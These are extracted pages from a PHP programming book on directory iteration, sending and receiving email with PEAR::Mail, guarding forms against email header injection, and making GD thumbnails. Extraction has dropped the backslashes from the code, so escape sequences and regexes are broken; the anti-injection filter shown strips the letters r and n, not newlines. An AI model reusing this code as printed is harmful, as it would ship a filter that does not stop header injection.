  • 199. Working with Files 175 SplFileObject is outside what we plan to cover in this solution, though, so be sure to check out the SPL documentation to learn more.18 Solution In this example, we use the DirectoryIterator class to iterate over a file directory and discover everything there is to know about the example.ini file: dirIterator.php (excerpt) <?php try { // handle the various files in the directory like an array foreach ( new DirectoryIterator('./') as $Item ) { echo $Item."n"; // tell me about this one file if($Item->getFilename() == 'example.ini') { echo "tProperties of example.inin"; echo "tFile name = " . $Item->getFilename() . "n"; echo "tPath = " . $Item->getPath() . "n"; echo "tPath name = " . $Item->getPathname() . "n"; echo "tPermission = " . $Item->getPerms() . "n"; echo "tInod = " . $Item->getInode() . "n"; echo "tSize = " . $Item->getSize() . "n"; echo "tOwner = " . $Item->getOwner() . "n"; echo "tGroup = " . $Item->getGroup() . "n"; echo "tAtime = " . $Item->getATime() . "n"; echo "tMtime = " . $Item->getMTime() . "n"; echo "tCTime = " . $Item->getCTime() . "n"; echo "tType = " . $Item->getType() . "n"; echo "tWritable = " . $Item->isWritable() . "n"; echo "tReadable = " . $Item->isReadable() . "n"; echo "tExecutable = " . $Item->isExecutable() . "n"; echo "tIs file = " . $Item->isFile() . "n"; echo "tIs directory = " . $Item->isDir() . "n"; echo "tIs link = " . $Item->isLink() . "n"; echo "tIs dot = " . $Item->isDot() . "n"; echo "tTo string = " . $Item->__toString() . "n"; echo '------------------------------------------------'."n"; 18 http://www.php.net/~helly/php/ext/spl/
  • 200. 176 The PHP Anthology echo "tFile contents = n"; readfile($Item->getPathName()); echo '------------------------------------------------'."n"; } } echo "nnAll the class methodsn"; // give me all the methods available to the Directory Iterator foreach( get_class_methods('DirectoryIterator') as $methodName) { echo $methodName."n"; } } catch(Exception $e){ // handle my exception echo 'No files Found! Message returned: '.$e->getMessage()."n"; } ?> Discussion We started the code with a simple try {…} catch {…} block to handle any excep­ tions that might occur while we’re working on the directory.19 Next, we meet the DirectoryIterator constructor in a foreach loop. The 20 DirectoryIterator is an implementation of the Iterator design pattern. For a class to implement the Iterator design pattern, it must provide a way to access the elements of the instantiated object in a sequential way. The DirectoryIterator object can be handled like an array and like an object. So we can put it in the foreach loop to iterate over the various files in the path provided to the constructor, which is similar to what we did earlier in the section called “How do I examine directories with PHP?” We then chose a file (example.ini) and looked at all its properties using the file object’s methods—and obtained much the same information we obtained earlier in “How do I examine directories with PHP?” but without all the if statements! 19 Exceptions are generally considered to be the better, object oriented way of handling errors, and are seen as preferable to the if block statements we saw earlier. 20 If you don’t know what a design pattern is yet, don’t worry! Plenty of information is available on the Web, for example, at Wikipedia: http://en.wikipedia.org/wiki/Iterator_pattern. The PHP Manual also has an entry on iteration at http://www.php.net/manual/en/language.oop5.iterations.php.
  • 201. Working with Files 177 Last of all, we wanted to access a full listing of the DirectoryIterator object’s methods. We used the get_class_methods function in another foreach loop to echo those methods out for us. If you want more information on DirectoryIterator, first look at the SPL docu­ mentation and all the method pages,21 paying particular attention to the user com­ ments. You can also review the SPL documentation with UML (Unified Modeling Language) diagrams,22 which will give you the opportunity to see what else is available in the SPL. Summary As you can see, working with files isn’t that hard! Actually, it’s fairly easy once you know what to use and how to use it. Plenty of file-related tools are available in the form of PHP’s built-in file system and streams functionality, numerous PEAR packages, and the PHP 5 Standard PHP Library (SPL). Each offers something to make your life easier—just don’t let your boss know how easy it really is! 21 http://www.php.net/spl/ 22 http://www.php.net/~helly/php/ext/spl/
  • 203. 7 Chapter Email Building online applications isn’t just about delivering pages to web browsers—such applications often involve email functionality as well. Email is used for a variety of tasks within a web application, including the mailing of regular newsletters as a means to stay in touch with visitors, and the provision of automated notifications for user registration systems. Once you know how to create email efficiently in PHP, it’s much easier to add email functionality to your web site, and to communicate with your site’s visitors. How do I send a simple email? So you need to send a simple text email. It’s nothing fancy—just a brief text message to pass on some information. Let’s see how it’s done. Solutions Two simple approaches are available. The first uses PHP’s built-in mail function, while the second relies on the PEAR::Mail package.
  • 204. 180 The PHP Anthology Using the PHP mail Function Sending simple emails is easy with PHP’s mail function.1 You need only one line of code to send a message—what could be easier? Here’s how it works: phpMail.php <?php mail('you@yourdomain.com', 'Howdy', 'Glad to meet you.', 'From: me@mydomain.com'); ?> The arguments supplied to the mail function above contain the following informa­ tion, in the order supplied here: ■ the address to which we’re sending the email ■ the subject of the email ■ the body of the email The last argument represents any extra header information you’d like to include in the email. In the example above, we’ve added a from header to set on the email the address from which the message was sent. Using the PEAR::Mail Package In this example, we’re sending the same email using the PEAR::Mail package: pearMail.php (excerpt) <?php error_reporting(E_ALL); require 'Mail.php'; $mail = Mail::factory('mail'); $headers = array( 'From' => 'me@mydomain.com', 'Subject' => 'Howdy' ); $succ = $mail->send('you@yourdomain.com', $headers, 'Glad to meet you.'); if (PEAR::isError($succ)) 1 http://www.php.net/manual/en/function.mail.php
  • 205. Email 181 { echo 'Email sending failed: ' . $succ->getMessage(); } else { echo 'Email sent succesfully'; } ?> Let’s ignore the first line for a minute, and look instead at the second line, where we include the PEAR::Mail package. Next, we use the static Mail::factory method to instantiate a Mail object that can send email for us. We supply the argument 'mail' to the factory method to indicate that we wish to use PHP’s built-in mail function. We then create an array for the header values we wish to include in our email, and finally call the Mail->send method, supplying the recipient’s email ad­ dress, our array of headers, and the body text of the email. The Mail->send method will return true if successful, and a PEAR_Error object if it’s unsuccessful. We can test for the presence of an error using the PEAR::IsError method and act accordingly. Watch Out for E_STRICT Errors The PEAR::Mail package was originally developed with PHP 4. If you use it in PHP 5 with E_STRICT errors turned on, you’ll receive E_STRICT errors. In our example above, and in others further on, we use the error_reporting function to set the level of reported errors to E_ALL, preventing E_STRICT errors from ap­ pearing in PHP 5. Discussion The mail function can integrate with the local sendmail client (an email application widely used on Unix-based systems), or with a remote SMTP (Simple Mail Transfer Protocol) server if you lack a sendmail-compatible client. Your web host should be able to supply the relevant SMTP server details for use in your script. However, if you’re using Windows for your development environment, you’ll need to tell PHP which SMTP server it should use to send mail by modifying the following settings in php.ini:
  • 206. 182 The PHP Anthology [mail function] ; For Win32 only. SMTP = smtp.yourdomain.com smtp_port = 25 sendmail_from = you@yourdomain.com Here, we’ve set the SMTP setting to the domain name of the SMTP server, which, in the vast majority of cases, will be the SMTP server provided by your ISP. We’ve also set the smtp_port setting to the appropriate server port number (the default is 25). The sendmail_from setting represents the sending address for your emails. Most of the emails you’ll want to send are probably not as simple as those we’ve been dealing with here. Even if you wanted to keep your emails simple and use only plain text, things could start to get a little complex as you started adding extra headers, composing longer messages, and including attachments. The second solution presented here uses more code than the first, which used only one line of PHP, but in exchange for the extra code we get a lot more flexibility, and we’ll find the system easier to use when we create more complex emails. For that reason, the remaining examples will use the various classes available from the PEAR package. How do I simplify the generation of complex emails? Using the mail function is fine for simple messages, but its limitations become ap­ parent when you attempt to create more complex emails. For instance, you might decide you want to have your own email address appearing in the From field of a message, to add people’s names alongside their addresses, to carbon copy (CC) email to a number of recipients, or to send your emails to a different SMTP server. In any of these cases, you’ll need something more than mail to get the job done. Enter: the PEAR::Mail and PEAR::Mail_Mime classes.2 These classes give the mail function a raft of extra functionality, such as the ability to include attachments, create HTML and mixed-format emails, bypass the mail function completely, and 2 See the Mail package documentation at http://pear.php.net/manual/en/package.mail.mail.php, and the Mail_Mime documentation at http://pear.php.net/manual/en/package.mail.mail-mime.php.
  • 207. Email 183 connect to an SMTP server directly. These classes also provide an API that makes the construction of more complex emails very easy. Solution This code uses a specified SMTP server to send email: pearMailSMTP.php (excerpt) <?php error_reporting(E_ALL); require 'Mail.php'; $mail = Mail::factory('smtp', array('host'=>'smtp.mydomain.com')); $hdrs = array( 'From' => 'Me <me@mydomain.com>', 'CC' => 'Mr Example <example@exampledomain.com>', 'Subject' => 'Howdy' ); $body = 'Glad to meet you.'; $succ = $mail->send('you@yourdomain.com', $hdrs, $body); if (PEAR::isError($succ)) { echo 'Email sending failed: ' . $succ->getMessage(); } else { echo 'Email sent succesfully'; } ?> Discussion Thanks to the PEAR::Mail class, we’re no longer limited to using PHP’s mail config­ uration, so we can set up mail as we choose. The Mail::factory method accepts parameters for the type of mail system you want to use, and for any options you want to specify for your back-end setup.3 Mail::factory accepts one of the follow­ ing: 3 See http://pear.php.net/manual/en/package.mail.mail.factory.php for more information on the options available for back-end mail systems.
  • 208. 184 The PHP Anthology mail uses the configured PHP mail settings sendmail allows you to control which sendmail program is used, and which options are sent to it smtp contacts an SMTP server to send the mail for you When we work with multipart emails—for example, emails that include text and HTML parts—we’ll use the PEAR::Mail_Mime class instead. It inherits from the PEAR::Mail class but provides a number of additional features to the API to make our lives much easier. How do I add attachments to messages? Sending an attachment with your email is incredibly easy with the PEAR::Mail_Mime class. Solution Take a look at this code, which shows the Mail_Mime->addAttachment method in action: attachment.php (excerpt) <?php error_reporting(E_ALL); require 'Mail.php'; require 'Mail/mime.php'; $mime = new Mail_Mime("rn"); $mime->setTXTBody('See attached text file.'); $mime->addAttachment( 'test.txt', 'text/plain', 'attached.txt', TRUE, 'quoted-printable' ); $body = $mime->get(); $hdrs = $mime->headers(array( 'From' => 'me@mydomain.com', 'Subject' => 'File Attachment' )); $mail = Mail::factory('smtp', array('host'=>'smtp.mydomain.com'));
  • 209. Email 185 $succ = $mail->send('you@yourdomain.com', $hdrs, $body); if (PEAR::isError($succ)) { echo 'Email sending failed: ' . $succ->getMessage(); } else { echo 'Email sent succesfully'; } ?> First, we instantiate a Mail_Mime object, passing the line endings we wish to use for the email. The text for the body of the email is then set using the Mail_Mime object’s setTXTBody method, and we add the attachment using the addAttachment method. Next, we call the get method to build the email’s body, and the header method to create any special headers we might need. The get method should always be called before the headers method. Then, just like the previous examples, we use the Mail::factory method to instan­ tiate our Mail object, and we call the send method to send our email, supplying it with the body and header parts we built using the Mail_Mime class. This solution’s simple and powerful—just how we like it! Discussion You can transfer more than just text files with the addAttachment method.4 Feel free to use it for images or application files. Just be sure to specify the correct content type for the file in the second argument. If you don’t supply any more arguments to the method, the defaults will be used—and usually, they’re fine. Here’s an ex­ ample: $mime->addAttachment('php.gif', 'image/gif'); If the defaults aren’t suitable, you can specify precisely how you want the file to be attached to the email. The third argument represents the filename you want the at­ tachment to display on the email. 4 To view the full documentation for the addAttachment method, see http://pear.php.net/manual/en/package.mail.mail-mime.addattachment.php.
  • 210. 186 The PHP Anthology Don’t feel like using a text file? Perhaps you’d rather use a variable containing the text that you want to attach? No problem. Place that variable in the first argument, and set the fourth to false, like so: $txt = 'testing testing - 1, 2, 3'; $mime->addAttachment( $txt, 'text/plain', 'TestMe.txt', false, 'quoted-printable' ); The fifth argument represents the transfer encoding. While the default encoding, 'base64', is fine for most files, for text-based files, you may wish to use 'quoted­ printable' instead. Did you See “Notice” Error Messages? At the time of writing, a number of Notice log messages will be thrown from the PEAR::Mail_Mime class if you use PHP 5.1.6 for this solution. These notices are the result of a change to the PHP internals, for which a bug report has been sub­ mitted to the PHP development team, but which doesn’t affect the output of the script. If the Notice messages bother you, turn them off with the error_reporting function, but remember that by doing this, you could also very easily hide a problem with your script. How do I send HTML email? Most email clients are capable of understanding HTML that’s placed in the body of an email. Using PEAR::Mail_Mime, it’s easy to add HTML to emails, and even to embed images within the document. This class will automatically determine whether or not you’ve placed HTML in the body of the message and set the MIME headers accordingly. You can also add an alternative text version of your email for use by recipients whose email clients cannot, or choose not, to display HTML emails.
  • 211. Email 187 Solution The code below sends a multipart message—one part is HTML, while the other is plain text—as well as an image that’s embedded in the HTML with an img tag: htmlEmail.php (excerpt) <?php error_reporting(E_ALL); include('Mail.php'); include('Mail/mime.php'); $text = "Text version of emailnMessage made with PHP"; $html = '<html><body>HTML version of email<br />'; $html .= 'Message made with <img src="12345" /></body></html>'; $crlf = "n"; $hdrs = array( 'From' => 'me@mydomain.com', 'Subject' => 'Test HTMl Email with Embedded Image' ); $mime = new Mail_mime($crlf); $mime->setTXTBody($text); $mime->addHTMLImage('php.gif', 'image/gif', '12345', true); $mime->setHTMLBody($html); $body = $mime->get(); $hdrs = $mime->headers($hdrs); $mail = Mail::factory('mail'); $succ = $mail->send('you@yourdomain.com', $hdrs, $body); if (PEAR::isError($succ)) { echo 'Email sending failed: ' . $succ->getMessage(); } else { echo 'Email sent succesfully'; } ?> The output of this code can be seen in Figure 7.1.
  • 212. 188 The PHP Anthology Figure 7.1. Displaying the multipart message How do I mail a message to a group of people? In many cases, it’s useful to be able to mail a message to more than one person at a time—for example, if you’re sending a newsletter, a message to a group mailing list, a site update notification to the IT staff, a feature freeze notification to a development team, and so on. However, in certain circumstances, sending unsolicited email to a group of people can also be called spamming—something I’m sure you won’t be doing with PHP! If you’re using PEAR::Mail_Mime, you have the option to send group email by adding BCC or CC headers to the email message. This approach may not suit your require­ ments, though—listing all the addresses from an especially large distribution list in the header of a single email can quickly overwhelm your email server. A better approach is to send each email individually, reusing the same instance of the PEAR::Mail_Mime class for each new message.
  • 213. Email 189 Solution In this hypothetical example, we’ll retrieve a list of names and email addresses from a discussion forum’s member database, and reuse one instance of the PEAR::Mail_Mime class to send an email to each of those addresses: group.php (excerpt) <?php error_reporting(E_ALL); require 'Mail.php'; require 'Mail/mime.php'; /* create the email */ $mime = new Mail_Mime("rn"); $mime->addAttachment('php.gif', 'image/gif'); $header = array( 'From' => 'me@mydomain.com', 'Subject' => 'Forum Newsletter' ); $mail = Mail::factory('smtp', array('host'=>'smtp.mydomain.net')); /* go to the database to get the member information */ $dsn = 'mysql:host=localhost;dbname=forum;'; $user = 'user'; $password = 'secret'; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'SELECT member_email, firstname, lastname FROM member'; /* cycle through the list sending the custom emails */ foreach ($dbh->query($sql) as $row) { $mime->setTXTBody( "Howdy {$row['firstname']} {$row['lastname']}"); $body = $mime->get(); $hdrs = $mime->headers( $header); $succ = $mail->send($row['member_email'], $hdrs, $body); if (PEAR::isError($succ))
  • 214. 190 The PHP Anthology { error_log("Email not sent to {$row['member_email']}: " . $succ->getMessage()); } } } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } ?> In the above example, we instantiate the PEAR::Mime_Mail object and set up the message and its sender. We then go to our hypothetical member database and retrieve each member’s email address, first name, and last name. Then, using that result set, we add a custom welcome message to the email, build the message, set the headers, and send the email to that user’s email address. Discussion For very large distribution lists, a simple foreach loop won’t quite cut it—you’ll risk flooding your mail server with messages! Instead, you’ll need to devise a means of sending the messages at a rate that your server can handle. The simplest way to achieve this is to use the PHP sleep function to pause your script every ten messages or so. You’ll also need to use the set_time_limit function to allow your script to run for more than the default thirty-second limit. Lastly, don’t forget to contact your hosting service to see if they have set any limit­ ations or restrictions to which you must adhere. Some hosting services place a strict limit on the number of emails that can be sent per hour, in an effort to protect themselves from being seen as spammers. Complying with Anti-spam Legislation In the United States (at the state and federal level), laws have been passed regarding unsolicited emails and spam. The USA has the federal CAN_SPAM law of 2003 as well as numerous individual state laws, and these may affect what you include
  • 215. Email 191 in, and how you send, your emails. The USA is not the only country to pass such laws, of course—countries in the European Union, Asia, South America, and so on around the globe have also put anti-spam legislation in place. For more inform­ ation, visit the Spam Laws web site (though it is not a definitive listing),5 and see your local government web site. How do I handle incoming mail with PHP? You’ve already seen that sending mail with PHP is no problem. But what about dealing with incoming mail using PHP? If your site is hosted on a Linux system, you’ll be happy to hear that with a little tuning, it’s easy to have PHP to examine incoming email. Solution In this solution, I’ll assume that you have your site hosted on a Linux-based system, that you have command prompt access to the server and are able to run PHP from the command prompt, and that you’re using sendmail to handle email on the server. Phew! It’s a long list of requirements, I know, but this fairly common configuration greatly simplifies matters. First things first: you need to place a file called .forward in your home directory. Use a text editor to write the following to the file (all on one line): you@yoursite.com "|/home/yourUserName/mailhandler.php" Now, within the PHP script mailhandler.php, you can process incoming email for the you@yoursite.com email address in any way you like. Here’s an example script that detects incoming email from a particular address and sends a second notification email in response: mailhandler.php (excerpt) #!/usr/bin/php <?php // Read the email from the stdin file $fp = fopen('php://stdin', 'r'); $email = fread ($fp, filesize('php://stdin')); 5 http://www.spamlaws.com/
  • 216. 192 The PHP Anthology fclose($fp); // Break the email up by linefeeds $email = explode("n", $email); // Initialize vars $numLines = count($email); for ($i = 0; $i < $numLines; $i++) { // Watch out for the From header if (preg_match("/^From: (.*)/", $email[$i], $matches)) { $from = $matches[1]; break; } } // Forward the message to the hotline email if (strstr($from, 'vip@example.com')) { mail('you@yourdomain.com', 'Urgent Message!', 'Check your mail!'); } ?> Discussion The .forward file tells the mail system on the server that any email that’s headed for you@yoursite.com not only needs to be delivered to that address, but must also be sent to the PHP script at /home/yourUserName/mailhandler.php. The PHP script that’s given in this solution is intended to be run automatically by the mail system—not by your web server. The first line of the file must point to the location of the standalone PHP program on your server (commonly /usr/bin/php) and is known as the shebang. After that, the code fetches the email from standard input and manipulates it. There are a number of ways in which you can manipulate an inbound email. First of all, you have the simple string functions we used above, which are built into PHP. The IMAP extension and the MailParse extension are also available. And in PEAR, you can use the Mail_Mime package (Mail_mimeDecode, to be specific) as well.6 6 For an example of Mail_mimeDecode in action, see http://pear.php.net/manual/en/package.mail.mail-mimedecode.example.php.
  • 217. Email 193 A Solution Looking for a Problem? The value that being able to handle incoming emails with PHP provides may not be obvious at first. But if you’ve ever read the SitePoint “TechTimes,”7 you know the answer—whether you realize it or not! The actions of subscribing to, and un­ subscribing from, that mailing list are handled by PHP. You could also use PHP to build spam filters, to allow users to submit updates to the versioning system of your application via emails sent to a special address (with proper authentication of course), and to create a whole host of other applications. How can I protect my site against email injection attacks? An email injection attack occurs when a cracker uses your web site’s email form to send email in a way you never intended—either by spoofing your form, or using a script to fill out the form and submit it. A few nastier examples of this sort of be­ havior include sending spam through your form, mailing mass email using your bandwidth, or sending emails that pretend to be from you in a phishing attempt. These kinds of attacks can have consequences—they may as simple as receiving a warning from your hosting provider, or as problematic as paying higher costs for bandwidth, suffering the revocation of your email privileges by the hosting company, or being blacklisted as a known spammer. By using PHP’s mail function to handle your site’s mail form, you open yourself to the possibility of an email injection attack not because of a fault in the PHP mail function, but because of the MIME and SMTP standards. Without getting into the details of those standards, you should know that all it takes for a cracker to gain control of your email form is for them to be able to add to or manipulate the mes­ sage’s original header. A craftily added new line character or additional header line is all it takes. Luckily, when you get right down to it, basic protection from an email injection attack is incredibly simple to implement: do not allow new lines in the user input that’s used in email headers. Despite the ease with which attacks are avoided using this technique, many developers fail to implement it. 7 http://www.sitepoint.com/newsletter/
  • 218. 194 The PHP Anthology Diving into the Details If you need more details on the SMTP and MIME protocols, search the Web for light-weight information, or go straight to the source by reading the relevant RFC’s (Request for Comments) at the Internet Engineering Task Force web site. For information on SMTP, see: ■ http://www.ietf.org/rfc/rfc0821.txt And for information on the MIME protocol, visit: ■ http://www.ietf.org/rfc/rfc2045.txt ■ http://www.ietf.org/rfc/rfc2046.txt ■ http://www.ietf.org/rfc/rfc2047.txt ■ http://www.ietf.org/rfc/rfc2048.txt ■ http://www.ietf.org/rfc/rfc2049.txt Solution Here’s an example that shows how to remove new lines from user input: attack.php (excerpt) <?php $error = FALSE; if (isset($_POST['submit'])) { $to = 'me@mydomain.com'; // replace new lines with a space // prevents a user from adding headers $subject = preg_replace('/[r|n]+/', " ", $_POST['subject']); $from = preg_replace('/[r|n]+/', " ", $_POST['from']); // basic validation for subject and email address $emailPattern = '/^[w-.]+@([w-]+.)+[w-]{2,4}$/'; if (preg_match('/^[^w .!?*%$#]+$/', $subject) || !preg_match($emailPattern, $from)) { $error = "Invalid input. Try again."; } if ($error === FALSE &&
  • 219. Email 195 mail($to, $subject, $_POST['message'], "FROM: $from")) { $error = "Message Sent"; } else { $error .= " We could not send your message. Sorry"; } } ?> Discussion As I mentioned, setting up basic protection from email injection attacks is as simple as removing any new lines from the user input, but you can gain additional protec­ tion by validating the user input that will be used in the header of the email—that is, by validating any text that will appear in the to, from or subject headers. In the solution provided here, I used the basic string function str_replace to search for a new line (r or n), and replace it with an empty space. I also validated the From address and the email Subject line to ensure that they contain legitimate values. The validation aspect is more difficult to explain, since it uses Perl-compatible regular expressions (also known as “pcre”) and is unfortunately beyond the scope of this section of the book. Luckily, there are plenty of resources available online to help you.8 Sites that provide additional information on email injection attacks include: ■ http://www.securephpwiki.com/index.php/Email_Injection ■ http://www.mailinjection.com/ ■ http://www.nyphp.org/phundamentals/email_header_injection.php Summary Email is a critical element of any business or web site. It provides a simple, easy way to communicate with your customers, visitors, coworkers, and even your 8 For more information on PHP’s implementation of pcre go to http://www.php.net/pcre/. For additional general information on regular expressions, check out http://www.regular-expressions.info/ on the Web.
  • 220. 196 The PHP Anthology server. Hopefully, this chapter has thrown a little light on some of the ways you can harness the power of PHP, and the flexibility of the PEAR::Mail and PEAR::Mail_Mime classes, to easily create and receive emails. Now go forth and use that power—to send newsletters, server updates, information, and visitor feedback—for good and not evil!
  • 221. 8 Chapter Images Building a web site can extend your creativity far beyond a display of (X)HTML formatted text, if you so choose. The umbrella term multimedia describes the delivery of many forms of content to your desktop, including sound, text, images, animation, and movies. Where images are concerned, PHP has great capabilities—you can use it to do a whole lot more than simply add static images to your HTML. Would you like to be able to add a watermark to your images, create appropriately sized thumbnails for your web page, or build a graph based on figures stored in your database? Would you like to do all that automatically and on the fly, using nothing but PHP? We’ll cover all this and more in the following pages. To use the examples here, you’ll need the GD image library for PHP. I’ll assume you have GD version 2.0 or higher (bundled with the latest versions of PHP) with Free- type, JPEG, GIF, and PNG support built in. The PHP functions that use the GD library are documented in The PHP Manual.1 The year 2004 saw the end of patent issues with GIF images, and support for this format in the GD library has been re-enabled since version 2.0.28, which was released with version 4.3.9 of PHP. 1 http://www.php.net/gd/
  • 222. 198 The PHP Anthology Although the GD library supports GIF images again, it’s worth noting that PNG is capable of supporting alpha channel transparency and full 64-bit images, compared with GIF’s 8 bits. In addition, PNG uses a more efficient compression algorithm, reducing the amount of bandwidth required. While this chapter focuses on the technical details of creating, manipulating, and using images and related libraries, you might also like to brush up on the basics. Mike Doughty has a great introduction to working with images and graphics on his web site.2 How do I specify the correct image MIME type? MIME stands for Multipurpose Internet Mail Extensions, a standard originally conceived to help identify different email content types. MIME has since become the de facto standard for the description of content types on the Internet. When you work with images in PHP, it’s important to have a grasp of the different content types, or you may end up struggling for hours with what’s actually a simple problem. Solution Generally speaking, your web server must announce content type by way of a special Content-Type header before it sends requested content to the user’s browser, so that the browser knows what to do with the content. For example, here are the headers that a server might send to announce an image in Portable Network Graphics (PNG) format: HTTP/1.1 200 OK Date: Fri, 28 Mar 2003 21:42:44 GMT Server: Apache/1.3.27 (Unix) PHP/4.3.1 Last-Modified: Wed, 26 Feb 2003 01:27:19 GMT Content-Length: 1164 Connection: close Content-Type: image/png 2 http://www.sketchpad.net/readme.htm
  • 223. Images 199 The Content-Type header is used to specify the MIME type of the content served in response to a request for the current URL. In this case, the MIME type is im­ age/png, which signifies a PNG image. It’s when we generate an image from a PHP script that the MIME type becomes im­ portant in PHP. By default, PHP scripts send a MIME type of text/html (denoting an HTML document). So, in instances when your script is sending an image instead of HTML, you’ll need to specify the MIME type with PHP’s header function. Here’s an example: <?php header('Content-Type: image/png'); ?> A list of the common MIME types you’ll need for images is shown in Table 8.1. Table 8.1. MIME Types for Images Image Format MIME Type JPEG File Interchange Format (.jpeg/.jpg) image/jpega Portable Network Graphics (.png) image/png Graphics Interchange Format (.gif) image/gif Windows Bitmap (.bmp) image/bmp Scalable Vector Graphics (.svg) image/xml+svg a Internet Explorer understands the image/jpeg type, but when uploading a JPEG image, it sends a type of image/pjpeg. How do I create thumbnail images? If your site will allow images to be uploaded, perhaps for display with submitted content, how can you make sure the images displayed will be of a suitable size? If a user uploads a particularly large image, it might destroy the layout of the page when it’s displayed. Solution One solution to this problem is to create thumbnail images, which guarantee that the images displayed never exceed certain height and width values.
  • 224. 200 The PHP Anthology Building a basic thumbnail is a five-stage process: 1. Load the source image into a PHP variable. 2. Determine the height and width of the original image. 3. Create a blank thumbnail image of the correct size. 4. Copy the original image to the blank thumbnail. 5. Display the thumbnail using the correct content type. Let’s create a thumbnail from a photo in JPEG format. First, we specify the path to the source image, as well as our desired width and height in pixels: thumb.php (excerpt) <?php $sourceImage = 'sample_images/terrier.jpg'; $thumbWidth = 200; $thumbHeight = 200; Next, we use imagecreatefromjpeg to load an image from the file system into a PHP variable: $original. The getimagesize function returns the width and height of the image (we’ll discuss getimagesize further in “How do I resize images without stretching them?”): thumb.php (excerpt) $original = imagecreatefromjpeg($sourceImage); $dims = getimagesize($sourceImage); We then use the imagecreatetruecolor function to create a blank image (in memory, as PHP variable $thumb) into which the thumbnail image will be placed: thumb.php (excerpt) $thumb = imagecreatetruecolor($thumbWidth,$thumbHeight); As the function name suggests, imagecreatetruecolor creates a true color (24-bit) image, as opposed to the palette-based (8-bit) image that the imagecreate function provides. The imagecreatefromjpeg function we used previously creates a true color image from the source file, so we need the thumbnail to be true color as well.
  • 225. Images 201 The next line in the example code is the point at which the thumbnail image is ac­ tually created from the original: thumb.php (excerpt) imagecopyresampled( $thumb, $original, 0, 0, 0, 0, $thumbWidth, $thumbHeight, $dims[0], $dims[1] ); The imagecopyresampled function places a resized version of the image into the blank thumbnail image, resampling along the way to ensure that the image is resized smoothly. An older version of this function, imagecopyresized, changes the size of the image more crudely. The first two arguments to the function represent the destination image, $thumb, and the source image, $original. The imagecopyresampled function is quite flexible and can be used to copy a portion of one image into another. The next four arguments refer to the x and y coordinates of the destination and source image portions, taken from the top-left corner. As we’re only interested in copying the whole image, we supply 0 for all four arguments. The final four arguments represent the width and height of the destination and source image portions. Again, as we wish to copy the whole image, we supply the full dimensions of each image. Refer to The PHP Manual for more information.3 Finally, after we’ve sent the correct content type header, Content-type: image/jpeg, we use imagejpeg to output the completed thumbnail: thumb.php (excerpt) header( "Content-type: image/jpeg" ); imagejpeg( $thumb ); ?> Figure 8.1 shows the end result. 3 http://www.php.net/imagecopyresampled/
  • 226. 202 The PHP Anthology Figure 8.1. Our first thumbnail While there’s certainly room for improvement, this is a start. How do I resize images without stretching them? Unless the original and thumbnail images happen to share the same width-to-height ratio (or aspect ratio), the process of resizing the images to generate your thumbnails will warp the dimensions of the images. What we really want is a proportionally scaled version of the original, which fits into the blank thumbnail as neatly as pos­ sible. Solution It’s possible to determine the original image’s dimensions and use these to calculate the proportional dimensions of the thumbnails. The getimagesize function returns an array of useful information about an image. Here’s an example: <?php $sourceImage = 'sample_images/terrier.jpg'; $dims = getimagesize($sourceImage); echo ( '<pre>' ); print_r($dims); echo ( '</pre>' ); ?> The above example will display the contents of the $dims variable:
  • 227. Images 203 Array ( [0] => 600 [1] => 450 [2] => 2 [3] => width="600" height="450" [bits] => 8 [channels] => 3 [mime] => image/jpeg ) The first element of the array is the width of the image; the second is its height. The third array element is a number that identifies the type of image, for which a 1 in­ dicates the image is a GIF, 2 indicates a JPEG, and 3 a PNG—more values are de­ scribed in The PHP Manual.4 The fourth array element contains a string that’s in­ tended to be used within HTML <img> tags. The bits element contains the color depth.5 The channels element contains a value of 3 for RGB color images and 4 for CMYK.6 The mime element contains the MIME type. In this section, we’ll write a class called Thumbnail that allows the generation of proportionally scaled images. The class will also make it possible for us to deal with images that are smaller than the thumbnail size, allowing them to be left at their original size if required. The class will be designed to handle PNG and JPEG files only, but can easily be modified to handle other formats. We need to define some custom exceptions for our error handling needs before we start to create our Thumbnail class: Thumbnail.class.php (excerpt) class ThumbnailException extends Exception { public function __construct($message = null, $code = 0) { parent::__construct($message, $code); 4 http://www.php.net/getimagesize/ 5 Eight bits can represent 256 colors, and 8-bit color is known as indexed color. True, or 24-bit color can represent 16,777,216 colors. 6 The RGB (Red-Green-Blue) color model is used for computer displays, while CMYK (Cyan-Magenta- Yellow-blacK) is used for printing.
  • 228. 204 The PHP Anthology error_log('Error in '.$this->getFile(). ' Line: '.$this->getLine(). ' Error: '.$this->getMessage() ); } } class ThumbnailFileException extends ThumbnailException {} class ThumbnailNotSupportedException extends ThumbnailException {} Our base custom exception class, ThumbnailException, ensures the exception details are logged using the error_log function. The subclasses represent different exception situations that might arise during the creation of the thumbnail. As with any class, we start with the class properties: Thumbnail.class.php (excerpt) class Thumbnail { private $maxWidth; private $maxHeight; private $scale; private $inflate; private $types; private $imgLoaders; private $imgCreators; private $source; private $sourceWidth; private $sourceHeight; private $sourceMime; private $thumb; private $thumbWidth; private $thumbHeight; $maxWidth, $maxHeight, $scale, $inflate, $types, $imgLoaders, and $imgCreators are set by the constructor and are described below. $source, $sourceWidth, $sourceHeight, and $sourceMime represent the properties of the source image and will be set by the image loading methods described below. $thumb, $thumbWidth, and $thumbHeight represent the properties of the created thumbnail and are also described below.
